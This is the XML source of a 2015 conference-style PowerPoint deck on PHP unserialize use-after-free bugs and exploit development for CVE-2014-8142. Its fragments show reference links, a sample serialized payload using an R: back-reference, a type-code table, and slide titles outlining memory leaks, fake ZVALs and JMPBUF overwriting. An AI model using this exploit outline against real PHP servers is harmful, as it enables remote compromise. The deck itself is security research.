                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>blog.sina.com.cn/s/blog_4c9ba28501000ar4.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8142</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://www.php-internals.com/book/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>p=chapt03/03-01-00-variables-structure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.php-internals.com/book/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>p=chapt06/06-02-php-memory-manager</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.slideshare.net/i0n1c/syscan-singapore-2010-returning-into-the-phpinterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>www.inulledmyself.com/2015/05/exploiting-memory-corruption-bugs-in.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>github.com/pwning/public-writeup/blob/master/hitcon2015/web500-use-after-flee/exploit.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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61C8-CC44-47B1-B9F4-48D275B29030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52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28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谢谢</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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Q&amp;A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3DF2-D69A-48DB-91E9-85601A0732D5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53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00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8200" y="2967335"/>
            <a:ext cx="10515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/>
              <a:t>string(117) "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O:8:"stdClass":3:{s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;s:10:"AAAAAAAAAA";i:3;i:4;i:4;i:5;}s:3:"aaa";i:1;s:3:"ccc";R:5;}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>"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2.1 Serialize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4DFE-04C0-467E-BE19-476FC6AB1758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450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8200" y="2551837"/>
            <a:ext cx="1051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/>
              <a:t>object(stdClass)#2 (2) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>  ["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>"]=&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>  int(1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>  ["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ccc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>"]=&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>  &amp;string(10) "1"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>}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2.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>nserialize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D2B8-72DC-403E-9D11-1C1E7C675CFE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41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2.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>序列数据结构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dirty="0"/>
              <a:t>a – array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>– Boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    3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dirty="0"/>
              <a:t>d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>– double</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    2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dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>– integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    1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dirty="0"/>
              <a:t>o - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>object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dirty="0"/>
              <a:t>r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>– reference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    7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dirty="0"/>
              <a:t>s - non-escaped binary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>string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dirty="0"/>
              <a:t>S - escaped binary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>string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   6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- custom object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>O – class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   5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dirty="0"/>
              <a:t>N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>– null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    0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dirty="0"/>
              <a:t>R - pointer reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>U - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> string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125-623A-4DD1-84BE-1FFC8C6DFA1B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824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2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反序列化过程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56D6-F5EC-482C-ABDE-32EF0BD65E13}" type="datetime1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北京知道创宇信息技术有限公司 牛保龙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EDC-048B-4890-961E-082E285FAC4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7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2410</TotalTime>
  <Words>3544</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>468</Paragraphs>
  <Slides>53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53</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="58" baseType="lpstr">
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>PHP反序列化UAF漏洞的研究与Exp编写</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>1. 简介</vt:lpstr>
      <vt:lpstr>2. PHP 序列化/反序列化</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>2.1 Serialize</vt:lpstr>
      <vt:lpstr>2.2 Unserialize</vt:lpstr>
      <vt:lpstr>2.3 序列数据结构</vt:lpstr>
      <vt:lpstr>2.4 反序列化过程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3. Unserialize漏洞类型分类</vt:lpstr>
      <vt:lpstr>4. Unserialize UAF漏洞历史</vt:lpstr>
      <vt:lpstr>5. CVE-2014-8142 Exp</vt:lpstr>
      <vt:lpstr>5.1 Leak memory info</vt:lpstr>
      <vt:lpstr>5.1.1 ZVAL structure</vt:lpstr>
      <vt:lpstr>5.1.1 ZVAL structure</vt:lpstr>
      <vt:lpstr>5.1.1 ZVAL structure</vt:lpstr>
      <vt:lpstr>5.1.1 Fake ZVAL</vt:lpstr>
      <vt:lpstr>5.1.2 Use after free</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>5.2 Leak std_object_handlers addrs</vt:lpstr>
      <vt:lpstr>5.2.1 Leak a object</vt:lpstr>
      <vt:lpstr>5.2.1 Object structure</vt:lpstr>
      <vt:lpstr>5.2.3 Object ZVAL structure</vt:lpstr>
      <vt:lpstr>5.3 Leak libphp5.so ELF info</vt:lpstr>
      <vt:lpstr>5.4 Leak useful PHP kernel functions</vt:lpstr>
      <vt:lpstr>5.5 Leak JMPBUF</vt:lpstr>
      <vt:lpstr>5.5.1 JMPBUF</vt:lpstr>
      <vt:lpstr>5.6 Crack JMPBUF</vt:lpstr>
      <vt:lpstr>5.6.1 反汇编setjmp()</vt:lpstr>
      <vt:lpstr>5.7 Overwrite JMPBUF</vt:lpstr>
      <vt:lpstr>5.7.3 释放 PHP 内存缓存块</vt:lpstr>
      <vt:lpstr>5.7.4 重用 PHP 内存缓存块</vt:lpstr>
      <vt:lpstr>5.7.5 释放自定义缓存块</vt:lpstr>
      <vt:lpstr>5.7.6 重用自定义缓存块</vt:lpstr>
      <vt:lpstr>5.7.5.1 再释放自定义缓存块</vt:lpstr>
      <vt:lpstr>5.7.6.1 再重用自定义缓存块</vt:lpstr>
      <vt:lpstr>5.7.5.2 再再释放自定义缓存块</vt:lpstr>
      <vt:lpstr>5.7.6.2 再再重用自定义缓存块</vt:lpstr>
      <vt:lpstr>5.7.6.2 再再重用自定义缓存块</vt:lpstr>
      <vt:lpstr>5.8 Trigger exception</vt:lpstr>
      <vt:lpstr>5.8 Trigger exception</vt:lpstr>
      <vt:lpstr>6. 参考</vt:lpstr>
      <vt:lpstr>谢谢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niubl</dc:creator>
  <cp:lastModifiedBy>niubl</cp:lastModifiedBy>
  <cp:revision>361</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-12-14T04:33:21Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-12-19T09:23:46Z</dcterms:modified>
</cp:coreProperties>
</file>